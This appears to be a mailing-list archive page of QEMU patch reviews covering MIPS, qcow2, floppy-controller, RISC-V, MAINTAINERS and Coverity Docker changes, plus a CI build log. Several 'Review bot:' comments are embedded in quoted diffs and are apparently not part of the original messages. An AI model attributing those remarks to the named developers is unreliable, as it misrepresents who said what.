findutils flex gcc gcc-c++ gettext git glib2-devel 
glusterfs-api-devel gnutls-devel gtk3-devel hostname 
libaio-devel libasan 

Re: [Qemu-devel] [PATCH] target/mips: Disable R5900 support

2018-11-13 Thread Philippe Mathieu-Daudé
On Tue, Nov 13, 2018 at 8:29 PM Philippe Mathieu-Daudé
 wrote:
> On Tue, Nov 13, 2018 at 8:08 PM Aleksandar Markovic
>  wrote:
> >
> > From: Aleksandar Markovic 
> >
> > Disable R5900 support. There are some outstanding issues related
> > to ABI support and emulation accuracy, that were not understood
> > well during review process. Disable to avoid backward compatibility
> > issues.

If the issues you mentioned are "the R5900 tcg opcodes are not
implemented correctly", then this patch is OK, because no cpu can use
the R5900 opcodes.

At some point while reading your reviews, I understood the R5900
patches introduced incorrect behaviors for the non-R5900 cpus. In this
case this patch wouldn't suffice.

> Can you add:
>
> This reverts commit ed4f49ba9bb56ebca6987b1083255daf6c89b5de.
>
> Or
>
> Fixes: ed4f49ba9
>
> when applying?

Hoping I misinterpreted your reviews, then this patch is OK.
With one of the suggested comments:
Reviewed-by: Philippe Mathieu-Daudé 

Then we will fix this for the 4.0 release.

Regards,

Phil.

> >
> > Signed-off-by: Aleksandar Markovic 
> > ---
> >  target/mips/translate_init.inc.c | 59 
> > 
> >  1 file changed, 59 deletions(-)
> >
> > diff --git a/target/mips/translate_init.inc.c 
> > b/target/mips/translate_init.inc.c
> > index 85da4a2..acab097 100644
> > --- a/target/mips/translate_init.inc.c
> > +++ b/target/mips/translate_init.inc.c
> > @@ -411,65 +411,6 @@ const mips_def_t mips_defs[] =
> >  .mmu_type = MMU_TYPE_R4000,
> >  },
> >  {
> > -/*
> > - * The Toshiba TX System RISC TX79 Core Architecture manual
> > - *
> > - * https://wiki.qemu.org/File:C790.pdf
> > - *
> > - * describes the C790 processor that is a follow-up to the R5900.
> > - * There are a few notable differences in that the R5900 FPU
> > - *
> > - * - is not IEEE 754-1985 compliant,
> > - * - does not implement double format, and
> > - * - its machine code is nonstandard.
> > - */
> > -.name = "R5900",
> > -.CP0_PRid = 0x2E00,
> > -/* No L2 cache, icache size 32k, dcache size 32k, uncached 
> > coherency. */
> > -.CP0_Config0 = (0x3 << 9) | (0x3 << 6) | (0x2 << CP0C0_K0),
> > -.CP0_Status_rw_bitmask = 0xF4C79C1F,
> > -#ifdef CONFIG_USER_ONLY
> > -/*
> > - * R5900 hardware traps to the Linux kernel for IEEE 754-1985 and 
> > LL/SC
> > - * emulation. For user only, QEMU is the kernel, so we emulate the 
> > traps
> > - * by simply emulating the instructions directly.
> > - *
> > - * Note: Config1 is only used internally, the R5900 has only 
> > Config0.
> > - */
> > -.CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU),
> > -.CP0_LLAddr_rw_bitmask = 0x,
> > -.CP0_LLAddr_shift = 4,
> > -.CP1_fcr0 = (0x38 << FCR0_PRID) | (0x0 << FCR0_REV),
> > -.CP1_fcr31 = 0,
> > -.CP1_fcr31_rw_bitmask = 0x0183,
> > -#else
> > -/*
> > - * The R5900 COP1 FPU implements single-precision floating-point
> > - * operations but is not entirely IEEE 754-1985 compatible. In
> > - * particular,
> > - *
> > - * - NaN (not a number) and +/- infinities are not supported;
> > - * - exception mechanisms are not fully supported;
> > - * - denormalized numbers are not supported;
> > - * - rounding towards nearest and +/- infinities are not supported;
> > - * - computed results usually differs in the least significant bit;
> > - * - saturations can differ more than the least significant bit.
> > - *
> > - * Since only rounding towards zero is supported, the two least
> > - * significant bits of FCR31 are hardwired to 01.
> > - *
> > - * FPU emulation is disabled here until it is implemented.
> > - *
> > - * Note: Config1 is only used internally, the R5900 has only 
> > Config0.
> > - */
> > -.CP0_Config1 = (47 << CP0C1_MMU),
> > -#endif /* !CONFIG_USER_ONLY */
> > -.SEGBITS = 32,
> > -.PABITS = 32,
> > -.insn_flags = CPU_R5900 | ASE_MMI,
> > -.mmu_type = MMU_TYPE_R4000,
> > -},
> > -{
> >  /* A generic CPU supporting MIPS32 Release 6 ISA.
> > FIXME: Support IEEE 754-2008 FP.
> >Eventually this should be replaced by a real CPU model. 
> > */
> > --
> > 2.7.4
> >
> >



Re: [Qemu-devel] [PATCH v7 6/6] qcow2: Avoid memory over-allocation on compressed images

2018-11-13 Thread Eric Blake

On 6/29/18 10:47 AM, Kevin Wolf wrote:

Am 29.06.2018 um 17:16 hat Eric Blake geschrieben:

On 06/29/2018 04:03 AM, Kevin Wolf wrote:

Am 28.06.2018 um 21:07 hat Eric Blake geschrieben:

When reading a compressed image, we were allocating s->cluster_data
to 32*cluster_size + 512 (possibly over 64 megabytes, for an image
with 2M clusters).  Let's check out the history:




However, the qcow2 spec permits an all-ones sector count, plus
a full sector containing the initial offset, for a maximum read
of 2 full clusters.  Thanks to the way decompression works, even
though such a value is too large for the actual compressed data
(for all but 512-byte clusters), it really doesn't matter if we
read too much (gzip ignores slop, once it has decoded a full
cluster).  So it's easier to just allocate cluster_data to be as
large as we can ever possibly see; even if it still wastes up to
2M on any image created by qcow2, that's still an improvment of


s/improvment/improvement/


60M less waste than pre-patch.




I wonder how much of a difference s->cluster_cache really makes. I
wouldn't expect guests to access the same cluster twice in a row.


I don't know if it makes a difference.  But my patch is not even touching
that - ALL I'm doing is changing a 64M allocation into a 4M allocation, with
otherwise no change to the frequency of allocation (which is once per
image).



Maybe the easiest solution would be switching to temporary buffers that
would have the exact size we need and would be freed at the end of the
request?


The exact size for a qemu-produced image would be at most 2M instead of 4M -
but doing the change you propose WILL cause more frequent allocations (once
per cluster, rather than once per image).  We'd have to benchmark if it
makes sense.


I wouldn't expect that another allocation makes a big difference when
you already have to decompress the whole cluster. In fact, it could
speed things up because we could then parallelise this.

Hmm... Wasn't there a series for using a worker thread for decompression
recently? It might actually already make that change, I don't remember.


But that would be a separate patch from this one.


Yes, just a thought I had while reviewing your patch.


Well, such a patch has now landed in your block-next queue, so I'm going 
to rebase this patch on top of that (if there's still anything left to 
rebase, that is), and submit the remaining parts of this series that 
still make sense for 3.1 as a v8 posting.


--
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3266
Virtualization:  qemu.org | libvirt.org



Re: [Qemu-devel] [PATCH for-3.1] fdc: fix segfault in fdctrl_stop_transfer() when DMA is disabled

2018-11-13 Thread John Snow



On 11/13/18 8:16 AM, Kevin Wolf wrote:
> Am 12.11.2018 um 20:58 hat John Snow geschrieben:
>>
>>
>> On 11/11/18 4:40 AM, Mark Cave-Ayland wrote:
>>> Commit c8a35f1cf0f "fdc: use IsaDma interface instead of global DMA_*
>>> functions" accidentally introduced a segfault in fdctrl_stop_transfer() for
>>> non-DMA transfers.
>>>
>>> If fdctrl->dma_chann has not been configured then the fdctrl->dma interface
>>> reference isn't initialised during isabus_fdc_realize(). Unfortunately
>>> fdctrl_stop_transfer() unconditionally references the DMA interface when
>>> finishing the transfer causing a NULL pointer dereference.
>>>
>>> Fix the issue by adding a check in fdctrl_stop_transfer() so that the DMA
>>> interface reference and release method is only invoked if fdctrl->dma_chann
>>> has been set.
>>>
>>> (This issue was discovered by Martin testing a recent change in the NetBSD
>>> installer under qemu-system-sparc)
>>>
>>> Reported-by: Martin Husemann 
>>> Signed-off-by: Mark Cave-Ayland 
>>> ---
>>>  hw/block/fdc.c | 2 +-
>>>  1 file changed, 1 insertion(+), 1 deletion(-)
>>>
>>> diff --git a/hw/block/fdc.c b/hw/block/fdc.c
>>> index 2e9c1e1e2f..6f19f127a5 100644
>>> --- a/hw/block/fdc.c
>>> +++ b/hw/block/fdc.c
>>> @@ -1617,7 +1617,7 @@ static void fdctrl_stop_transfer(FDCtrl *fdctrl, 
>>> uint8_t status0,
>>>  fdctrl->fifo[5] = cur_drv->sect;
>>>  fdctrl->fifo[6] = FD_SECTOR_SC;
>>>  fdctrl->data_dir = FD_DIR_READ;
>>> -if (!(fdctrl->msr & FD_MSR_NONDMA)) {
>>> +if (fdctrl->dma_chann != -1 && !(fdctrl->msr & FD_MSR_NONDMA)) {
>>>  IsaDmaClass *k = ISADMA_GET_CLASS(fdctrl->dma);
>>>  k->release_DREQ(fdctrl->dma, fdctrl->dma_chann);
>>>  }
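Review bot: The new guard tests `fdctrl->dma_chann != -1` as a proxy for "the DMA interface was initialised", but according to the description the object that is actually missing is `fdctrl->dma`; checking the pointer itself, `if (fdctrl->dma && !(fdctrl->msr & FD_MSR_NONDMA)) {`, would express that invariant directly and not depend on -1 being the only unconfigured channel value. If the -1 convention is what the rest of fdc.c keys off, the proxy is acceptable, but a comment such as `/* no DMA interface was set up when dma_chann is unset */` would make the link explicit. fdctrl_stop_transfer starts outside this hunk.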
>>>
>>
>> Thanks.
>>
>> Reviewed-by: John Snow 
>>
>> ... Kevin, would you mind staging this one-off for the next RC?
> 
> No problem, I'm applying this to my block branch. However, my pull
> request for -rc1 is already merged, so this will have to wait until next
> week and -rc2.
> 
> Kevin
> 

I think that should be fine. Thank you!



Re: [Qemu-devel] [PATCH v5 00/14] arm: nRF51 Devices and Microbit Support

2018-11-13 Thread no-reply
Hi,

This series failed the docker-quick@centos7 build test. Please find the testing commands and
their output below. If you have Docker installed, you can probably reproduce it
locally.

Type: series
Message-id: 20181112214224.31560-1-cont...@steffen-goertz.de
Subject: [Qemu-devel] [PATCH v5 00/14] arm: nRF51 Devices and Microbit Support

=== TEST SCRIPT BEGIN ===
#!/bin/bash
time make docker-test-quick@centos7 SHOW_ENV=1 J=8
=== TEST SCRIPT END ===

Updating 3c8cf5a9c21ff8782164d1def7f44bd888713384
Switched to a new branch 'test'
187f1fc84c arm: Add Clock peripheral stub to NRF51 SOC
46c8bafa10 tests/microbit-test: Add Tests for nRF51 Timer
4a8e69516c arm: Instantiate NRF51 Timers
48bafc25c5 hw/timer/nrf51_timer: Add nRF51 Timer peripheral
300ab01b3e tests/microbit-test: Add Tests for nRF51 GPIO
2d8d566dda arm: Instantiate NRF51 general purpose I/O
b5e2ea643d hw/gpio/nrf51_gpio: Add nRF51 GPIO peripheral
76a11e0531 tests: Add bbc:microbit / nRF51 test suite
00b8265b8b arm: Instantiate NRF51 special NVM's and NVMC
faacca4fcb hw/nvram/nrf51_nvm: Add nRF51 non-volatile memories
3619b14640 arm: Instantiate NRF51 random number generator
ca058f1721 hw/misc/nrf51_rng: Add NRF51 random number generator peripheral
bfbb2b5de5 arm: Add header to host common definition for nRF51 SOC peripherals
8e46d5f624 qtest: Add set_irq_in command to set IRQ/GPIO level

=== OUTPUT BEGIN ===
  BUILD   centos7
make[1]: Entering directory '/var/tmp/patchew-tester-tmp-9fm5emqg/src'
  GEN 
/var/tmp/patchew-tester-tmp-9fm5emqg/src/docker-src.2018-11-13-14.45.50.17193/qemu.tar
Cloning into 
'/var/tmp/patchew-tester-tmp-9fm5emqg/src/docker-src.2018-11-13-14.45.50.17193/qemu.tar.vroot'...
done.
Your branch is up-to-date with 'origin/test'.
Submodule 'dtc' (git://git.qemu-project.org/dtc.git) registered for path 'dtc'
Cloning into 
'/var/tmp/patchew-tester-tmp-9fm5emqg/src/docker-src.2018-11-13-14.45.50.17193/qemu.tar.vroot/dtc'...
Submodule path 'dtc': checked out '88f18909db731a627456f26d779445f84e449536'
Submodule 'ui/keycodemapdb' (git://git.qemu.org/keycodemapdb.git) registered 
for path 'ui/keycodemapdb'
Cloning into 
'/var/tmp/patchew-tester-tmp-9fm5emqg/src/docker-src.2018-11-13-14.45.50.17193/qemu.tar.vroot/ui/keycodemapdb'...
Submodule path 'ui/keycodemapdb': checked out 
'6b3d716e2b6472eb7189d3220552280ef3d832ce'
  COPYRUNNER
RUN test-quick in qemu:centos7 
Packages installed:
SDL-devel-1.2.15-14.el7.x86_64
bison-3.0.4-1.el7.x86_64
bzip2-1.0.6-13.el7.x86_64
bzip2-devel-1.0.6-13.el7.x86_64
ccache-3.3.4-1.el7.x86_64
csnappy-devel-0-6.20150729gitd7bc683.el7.x86_64
flex-2.5.37-3.el7.x86_64
gcc-4.8.5-28.el7_5.1.x86_64
gettext-0.19.8.1-2.el7.x86_64
git-1.8.3.1-14.el7_5.x86_64
glib2-devel-2.54.2-2.el7.x86_64
libaio-devel-0.3.109-13.el7.x86_64
libepoxy-devel-1.3.1-2.el7_5.x86_64
libfdt-devel-1.4.6-1.el7.x86_64
lzo-devel-2.06-8.el7.x86_64
make-3.82-23.el7.x86_64
mesa-libEGL-devel-17.2.3-8.20171019.el7.x86_64
mesa-libgbm-devel-17.2.3-8.20171019.el7.x86_64
nettle-devel-2.7.1-8.el7.x86_64
package g++ is not installed
package librdmacm-devel is not installed
pixman-devel-0.34.0-1.el7.x86_64
spice-glib-devel-0.34-3.el7_5.1.x86_64
spice-server-devel-0.14.0-2.el7_5.4.x86_64
tar-1.26-34.el7.x86_64
vte-devel-0.28.2-10.el7.x86_64
xen-devel-4.6.6-12.el7.x86_64
zlib-devel-1.2.7-17.el7.x86_64

Environment variables:
PACKAGES=bison bzip2 bzip2-devel ccache csnappy-devel flex  
   g++ gcc gettext git glib2-devel libaio-devel 
libepoxy-devel libfdt-devel librdmacm-devel lzo-devel make 
mesa-libEGL-devel mesa-libgbm-devel nettle-devel pixman-devel 
SDL-devel spice-glib-devel spice-server-devel tar vte-devel 
xen-devel zlib-devel
HOSTNAME=6697295bc889
MAKEFLAGS= -j8
J=8
CCACHE_DIR=/var/tmp/ccache
EXTRA_CONFIGURE_OPTS=
V=
SHOW_ENV=1
PATH=/usr/lib/ccache:/usr/lib64/ccache:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
TARGET_LIST=
SHLVL=1
HOME=/home/patchew
TEST_DIR=/tmp/qemu-test
FEATURES= dtc
DEBUG=
_=/usr/bin/env

Configure options:
--enable-werror --target-list=x86_64-softmmu,aarch64-softmmu 
--prefix=/tmp/qemu-test/install
No C++ compiler available; disabling C++ specific optional code
Install prefix/tmp/qemu-test/install
BIOS directory/tmp/qemu-test/install/share/qemu
firmware path /tmp/qemu-test/install/share/qemu-firmware
binary directory  /tmp/qemu-test/install/bin
library directory /tmp/qemu-test/install/lib
module directory  /tmp/qemu-test/install/lib/qemu
libexec directory /tmp/qemu-test/install/libexec
include directory /tmp/qemu-test/install/include
config directory  /tmp/qemu-test/install/etc
local state directory   /tmp/qemu-test/install/var
Manual directory  /tmp/qemu-test/install/share/man
ELF interp prefix /usr/gnemul/qemu-%M
Source path   /tmp/qemu-test/src
GIT binarygit
GIT submodules
C compilercc
Host C compiler   cc
C++ compiler  
Objective-C compiler cc
ARFLAGS  

Re: [Qemu-devel] [PATCH 1/2] target/riscv: Fix FCLASS_D being treated as RV64 only

2018-11-13 Thread Alistair Francis
On Thu, Nov 8, 2018 at 4:07 AM Bastian Koppelmann
 wrote:
>
> Signed-off-by: Bastian Koppelmann 

Reviewed-by: Alistair Francis 

Alistair

> ---
>  target/riscv/translate.c | 4 +++-
>  1 file changed, 3 insertions(+), 1 deletion(-)
>
> diff --git a/target/riscv/translate.c b/target/riscv/translate.c
> index 18d7b6d147..5359088e24 100644
> --- a/target/riscv/translate.c
> +++ b/target/riscv/translate.c
> @@ -1237,13 +1237,14 @@ static void gen_fp_arith(DisasContext *ctx, uint32_t 
> opc, int rd,
>  tcg_temp_free(t0);
>  break;
>
> -#if defined(TARGET_RISCV64)
>  case OPC_RISC_FMV_X_D:
>  /* also OPC_RISC_FCLASS_D */
>  switch (rm) {
> +#if defined(TARGET_RISCV64)
>  case 0: /* FMV */
>  gen_set_gpr(rd, cpu_fpr[rs1]);
>  break;
> +#endif
>  case 1:
>  t0 = tcg_temp_new();
>  gen_helper_fclass_d(t0, cpu_fpr[rs1]);
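Review bot: With `case 0` now inside the TARGET_RISCV64 guard, an RV32 guest issuing FMV.X.D (rm == 0) falls to whatever the switch's default is, and that default sits in the gap between the two hunks where it cannot be checked here; it should raise an illegal-instruction exception rather than emit nothing, since the opcode is genuinely invalid on RV32. A one-line comment at the `#if`, `/* FMV.X.D needs a 64-bit GPR; FCLASS_D below is valid on RV32 too */`, would record why only the first case is conditional. gen_fp_arith starts and ends outside the hunk.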
> @@ -1255,6 +1256,7 @@ static void gen_fp_arith(DisasContext *ctx, uint32_t 
> opc, int rd,
>  }
>  break;
>
> +#if defined(TARGET_RISCV64)
>  case OPC_RISC_FMV_D_X:
>  t0 = tcg_temp_new();
>  gen_get_gpr(t0, rs1);
> --
> 2.19.1
>
>



Re: [Qemu-devel] [PATCH 2/2] target/riscv: Fix sfence.vm/a both available in any priv version

2018-11-13 Thread Alistair Francis
On Thu, Nov 8, 2018 at 4:07 AM Bastian Koppelmann
 wrote:
>
> sfence.vm has been replaced in priv v1.10 spec by sfence.vma.
>
> Reported-by: Richard Henderson 
> Signed-off-by: Bastian Koppelmann 

Reviewed-by: Alistair Francis 

Alistair

> ---
>  target/riscv/translate.c | 18 +-
>  1 file changed, 13 insertions(+), 5 deletions(-)
>
> diff --git a/target/riscv/translate.c b/target/riscv/translate.c
> index 5359088e24..f44eb9c41b 100644
> --- a/target/riscv/translate.c
> +++ b/target/riscv/translate.c
> @@ -1292,10 +1292,14 @@ static void gen_system(CPURISCVState *env, 
> DisasContext *ctx, uint32_t opc,
>  #ifndef CONFIG_USER_ONLY
>  /* Extract funct7 value and check whether it matches SFENCE.VMA */
>  if ((opc == OPC_RISC_ECALL) && ((csr >> 5) == 9)) {
> -/* sfence.vma */
> -/* TODO: handle ASID specific fences */
> -gen_helper_tlb_flush(cpu_env);
> -return;
> +if (env->priv_ver == PRIV_VERSION_1_10_0) {
> +/* sfence.vma */
> +/* TODO: handle ASID specific fences */
> +gen_helper_tlb_flush(cpu_env);
> +return;
> +} else {
> +gen_exception_illegal(ctx);
> +}
>  }
>  #endif
>
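Review bot: The new guard `if (env->priv_ver == PRIV_VERSION_1_10_0)` tests for exact equality, while the SFENCE.VM check in the second hunk uses `<= PRIV_VERSION_1_09_1`; a later privileged-spec constant would presumably make SFENCE.VMA illegal under this form, so `if (env->priv_ver >= PRIV_VERSION_1_10_0)` mirrors the other hunk and survives a future version. The else branch also falls through after `gen_exception_illegal(ctx);` whereas the matching branch returns; unless the code after `#endif` (outside the hunk) is harmless once the exception has been generated, a `return;` after the call keeps the two branches symmetric. gen_system begins before the hunk.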
> @@ -1342,7 +1346,11 @@ static void gen_system(CPURISCVState *env, 
> DisasContext *ctx, uint32_t opc,
>  gen_helper_wfi(cpu_env);
>  break;
>  case 0x104: /* SFENCE.VM */
> -gen_helper_tlb_flush(cpu_env);
> +if (env->priv_ver <= PRIV_VERSION_1_09_1) {
> +gen_helper_tlb_flush(cpu_env);
> +} else {
> +gen_exception_illegal(ctx);
> +}
>  break;
>  #endif
>  default:
> --
> 2.19.1
>
>



Re: [Qemu-devel] [PATCH] MAINTAINERS: list myself as maintainer for various Arm boards

2018-11-13 Thread Alistair Francis
On Thu, Nov 8, 2018 at 5:41 AM Peter Maydell  wrote:
>
> In practice for most of the more-or-less orphan Arm board models,
> I will review patches and put them in via the target-arm tree.
> So list myself as an "Odd Fixes" status maintainer for them.
>
> This commit downgrades these boards to "Odd Fixes":
>  * Allwinner-A10
>  * Exynos
>  * Calxeda Highbank
>  * Canon DIGIC
>  * Musicpal
>  * nSeries
>  * Palm
>  * PXA2xx
>
> Signed-off-by: Peter Maydell 
> ---
> Thomas Huth sent a patch which only addressed collie, but
> let's be consistent.
>
> The set of downgrades to odd-fixes is based mostly on my
> subjective impression of whether anybody has made any changes
> to the board models over the last year or so, so it's quite
> possible I've forgotten that one of them is in better shape
> maintainer-activity-wise. If the maintainers for those boards
> disagree (cc'd) I'm happy to re-upgrade them to Maintained.
>
> Arguably it would be nice to have a letter prefix for "this
> is the person who will deal with getting the patch into the
> tree, but somebody else will be the primary maintainer for
> patch review" -- that's the situation for the maintained/
> active boards like ASpeed.
> ---
>  MAINTAINERS | 36 +++-
>  1 file changed, 27 insertions(+), 9 deletions(-)
>
> diff --git a/MAINTAINERS b/MAINTAINERS
> index 0d68e4bc5eb..4443105686d 100644
> --- a/MAINTAINERS
> +++ b/MAINTAINERS
> @@ -436,8 +436,9 @@ ARM Machines
>  
>  Allwinner-a10
>  M: Beniamino Galvani 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/*/allwinner*
>  F: include/hw/*/allwinner*
>  F: hw/arm/cubieboard.c
> @@ -496,27 +497,31 @@ F: tests/test-arm-mptimer.c
>
>  Exynos
>  M: Igor Mitsyanko 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/*/exynos*
>  F: include/hw/arm/exynos4210.h
>
>  Calxeda Highbank
>  M: Rob Herring 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/arm/highbank.c
>  F: hw/net/xgmac.c
>
>  Canon DIGIC
>  M: Antony Pavlov 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: include/hw/arm/digic.h
>  F: hw/*/digic*
>
>  Gumstix
>  M: Philippe Mathieu-Daudé 
> +M: Peter Maydell 
>  L: qemu-devel@nongnu.org
>  L: qemu-...@nongnu.org
>  S: Odd Fixes
> @@ -524,8 +529,9 @@ F: hw/arm/gumstix.c
>
>  i.MX31
>  M: Peter Chubb 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Odd fixes
> +S: Odd Fixes
>  F: hw/*/imx*
>  F: include/hw/*/imx*
>  F: hw/arm/kzm.c
> @@ -555,20 +561,23 @@ F: include/hw/misc/iotkit-sysinfo.h
>
>  Musicpal
>  M: Jan Kiszka 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/arm/musicpal.c
>
>  nSeries
>  M: Andrzej Zaborowski 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/arm/nseries.c
>
>  Palm
>  M: Andrzej Zaborowski 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/arm/palm.c
>
>  Real View
> @@ -582,8 +591,9 @@ F: include/hw/intc/realview_gic.h
>
>  PXA2XX
>  M: Andrzej Zaborowski 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/arm/mainstone.c
>  F: hw/arm/spitz.c
>  F: hw/arm/tosa.c
> @@ -608,6 +618,7 @@ F: hw/misc/arm_sysctl.c
>  Xilinx Zynq
>  M: Edgar E. Iglesias 
>  M: Alistair Francis 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
>  S: Maintained
>  F: hw/*/xilinx_*
> @@ -619,6 +630,7 @@ X: hw/ssi/xilinx_*
>  Xilinx ZynqMP
>  M: Alistair Francis 
>  M: Edgar E. Iglesias 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
>  S: Maintained
>  F: hw/*/xlnx*.c
> @@ -632,6 +644,7 @@ F: hw/arm/virt-acpi-build.c
>
>  STM32F205
>  M: Alistair Francis 
> +M: Peter Maydell 
>  S: Maintained
>  F: hw/arm/stm32f205_soc.c
>  F: hw/misc/stm32f2xx_syscfg.c
> @@ -643,11 +656,13 @@ F: include/hw/*/stm32*.h
>
>  Netduino 2
>  M: Alistair Francis 
> +M: Peter Maydell 
>  S: Maintained
>  F: hw/arm/netduino2.c

These two and the Xilinx boards seem a little out of place in this
patch. I agree they probably aren't maintained as well as they should
be, but the patch talks about orphaned boards and these four all have
active QEMU maintainers listed.

Alistair

>
>  SmartFusion2
>  M: Subbaraya Sundeep 
> +M: Peter Maydell 
>  S: Maintained
>  F: hw/arm/msf2-soc.c
>  F: hw/misc/msf2-sysreg.c
> @@ -660,11 +675,13 @@ F: include/hw/ssi/mss-spi.h
>
>  Emcraft M2S-FG484
>  M: Subbaraya Sundeep 
> +M: Peter Maydell 
>  S: Maintained
>  F: hw/arm/msf2-som.c
>
>  ASPEED BMCs
>  M: Cédric Le Goater 
> +M: Peter Maydell 
>  R: Andrew Jeffery 
>  R: Joel Stanley 
>  L: qemu-...@nongnu.org
> @@ -676,6 +693,7 @@ F: include/hw/net/ftgmac100.h
>
>  NRF51
>  M: Joel Stanley 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
>  S: Maintained
>  F: hw/arm/nrf51_soc.c
> --
> 2.19.1
>
>



Re: [Qemu-devel] [PATCH 2/2] scripts/coverity-scan: Add Docker support

2018-11-13 Thread Philippe Mathieu-Daudé

On 13/11/18 19:46, Peter Maydell wrote:

Add support for running the Coverity Scan tools inside a Docker
container rather than directly on the host system.

Signed-off-by: Peter Maydell 
---
  scripts/coverity-scan/coverity-scan.docker | 120 +
  scripts/coverity-scan/run-coverity-scan|  58 ++
  2 files changed, 178 insertions(+)
  create mode 100644 scripts/coverity-scan/coverity-scan.docker

diff --git a/scripts/coverity-scan/coverity-scan.docker 
b/scripts/coverity-scan/coverity-scan.docker
new file mode 100644
index 000..81f69459954
--- /dev/null
+++ b/scripts/coverity-scan/coverity-scan.docker
@@ -0,0 +1,120 @@
+# syntax=docker/dockerfile:1.0.0-experimental
+#
+# Docker setup for running the "Coverity Scan" tools over the source
+# tree and uploading them to the website, as per
+# https://scan.coverity.com/projects/qemu/builds/new
+# We do this on a fixed config (currently Fedora 28 with a known
+# set of dependencies and a configure command that enables a specific
+# set of options) so that random changes don't result in our accidentally
+# dropping some files from the scan.
+# The work of actually doing the build is handled by the
+# run-coverity-scan script.
+
+
+FROM fedora:28
+ENV PACKAGES \
+alsa-lib-devel \
+bc \
+bison \
+bluez-libs-devel \
+brlapi-devel \
+bzip2 \
+bzip2-devel \
+ccache \
+clang \
+curl \
+cyrus-sasl-devel \
+device-mapper-multipath-devel \
+findutils \
+flex \
+gcc \
+gcc-c++ \
+gettext \
+git \
+glib2-devel \
+glusterfs-api-devel \
+gnutls-devel \
+gtk3-devel \
+hostname \
+libaio-devel \
+libasan \
+libattr-devel \
+libcap-devel \
+libcap-ng-devel \
+libcurl-devel \
+libepoxy-devel \
+libfdt-devel \
+libgbm-devel \
+libiscsi-devel \
+libjpeg-devel \
+libnfs-devel \
+libpng-devel \
+librbd-devel \
+libseccomp-devel \
+libssh2-devel \
+libubsan \
+libudev-devel \
+libusbx-devel \
+libxml2-devel \
+llvm \
+lzo-devel \
+make \
+mingw32-bzip2 \
+mingw32-curl \
+mingw32-glib2 \
+mingw32-gmp \
+mingw32-gnutls \
+mingw32-gtk3 \
+mingw32-libjpeg-turbo \
+mingw32-libpng \
+mingw32-libssh2 \
+mingw32-libtasn1 \
+mingw32-nettle \
+mingw32-pixman \
+mingw32-pkg-config \
+mingw32-SDL2 \
+mingw64-bzip2 \
+mingw64-curl \
+mingw64-glib2 \
+mingw64-gmp \
+mingw64-gnutls \
+mingw64-gtk3 \
+mingw64-libjpeg-turbo \
+mingw64-libpng \
+mingw64-libssh2 \
+mingw64-libtasn1 \
+mingw64-nettle \
+mingw64-pixman \
+mingw64-pkg-config \
+mingw64-SDL2 \
+ncurses-devel \
+nettle-devel \
+nss-devel \
+numactl-devel \
+perl \
+pixman-devel \
+pulseaudio-libs-devel \
+python3 \
+PyYAML \
+rdma-core-devel \
+SDL2-devel \
+snappy-devel \
+sparse \
+spice-server-devel \
+systemtap-sdt-devel \
+tar \
+usbredir-devel \
+virglrenderer-devel \
+vte3-devel \
+wget \
+which \
+xen-devel \
+xfsprogs-devel \
+zlib-devel
+ENV QEMU_CONFIGURE_OPTS --python=/usr/bin/python3
+
+RUN dnf install -y $PACKAGES
+RUN rpm -q $PACKAGES | sort > /packages.txt
+ENV COVERITY_TOOL_BASE=/coverity-tools
+COPY run-coverity-scan run-coverity-scan
+RUN --mount=type=secret,id=coverity.token,required ./run-coverity-scan 
--update-tools-only --tokenfile /run/secrets/coverity.token
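Review bot: The header comment promises a "fixed config" with a "known set of dependencies", but `RUN dnf install -y $PACKAGES` installs whatever versions the Fedora 28 repositories serve at build time, so the configuration is only as fixed as the base image tag, and the `rpm -q $PACKAGES | sort > /packages.txt` line records the versions after the fact rather than pinning them. A sentence in the header, `# Package versions are not pinned; /packages.txt records what a given image build actually installed.`, would set expectations for anyone comparing two scan runs. The token is read through a BuildKit secret mount and handed over with `--tokenfile` rather than on the command line, which keeps it out of the image layers; a comment above that RUN line saying so would stop a later edit from "simplifying" it into an ENV or build argument.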


Calling "make docket-image-fedora" you can reduce this script to:

-- >8 --
FROM qemu:fedora
ENV PACKAGES \
$PACKAGES \
alsa-lib-devel \
curl \
cyrus-sasl-devel \
libepoxy-devel \
libgbm-devel \
libiscsi-devel \
libnfs-devel \
libseccomp-devel \
libudev-devel \
pulseaudio-libs-devel \
rdma-core-devel \
wget \
xfsprogs-devel

RUN dnf install -y $PACKAGES
RUN rpm -q $PACKAGES | sort > /packages.txt
ENV COVERITY_TOOL_BASE=/coverity-tools
COPY run-coverity-scan run-coverity-scan
RUN --mount=type=secret,id=coverity.token,required ./run-coverity-scan 
--update-tools-only --tokenfile /run/secrets/coverity.token

---

sharing a big docker layer.



Re: [Qemu-devel] [PATCH] target/i386: Generate #UD when applying LOCK to a register destination

2018-11-13 Thread Philippe Mathieu-Daudé
On Tue, Nov 13, 2018 at 8:36 PM Richard Henderson
 wrote:
>
> Fixes a TCG crash due to attempting the atomic operation without
> having set up the address first.  This does not attempt to fix
> all of the other missing checks for LOCK.
>
> Fixes: a7cee522f35
> Fixes: https://bugs.launchpad.net/qemu/+bug/1803160
> Signed-off-by: Richard Henderson 

Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 

> ---
>  target/i386/translate.c | 35 ---
